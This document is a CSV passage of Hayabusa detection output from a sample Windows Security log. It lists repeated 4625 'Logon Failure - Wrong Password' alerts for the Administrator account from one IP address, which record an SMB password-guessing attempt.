2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 
01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.275 